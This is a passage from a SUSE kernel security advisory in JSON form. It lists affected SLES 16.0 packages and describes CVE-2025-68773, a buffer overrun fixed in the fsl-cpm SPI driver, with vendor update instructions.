"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-68771"
},
{
"cve": "CVE-2025-68773",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68773"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nspi: fsl-cpm: Check length parity before switching to 16 bit mode\n\nCommit fc96ec826bce (\"spi: fsl-cpm: Use 16 bit mode for large transfers\nwith even size\") failed to make sure that the size is really even\nbefore switching to 16 bit mode. Until recently the problem went\nunnoticed because kernfs uses a pre-allocated bounce buffer of size\nPAGE_SIZE for reading EEPROM.\n\nBut commit 8ad6249c51d0 (\"eeprom: at25: convert to spi-mem API\")\nintroduced an additional dynamically allocated bounce buffer whose size\nis exactly the size of the transfer, leading to a buffer overrun in\nthe fsl-cpm driver when that size is odd.\n\nAdd the missing length parity verification and remain in 8 bit mode\nwhen the length is not even.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68773",
"url": "https://www.suse.com/security/cve/CVE-2025-68773"
},
{
"category": "external",
"summary": "SUSE Bug 1256586 for CVE-2025-68773",
"url": "https://bugzilla.suse.com/1256586"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
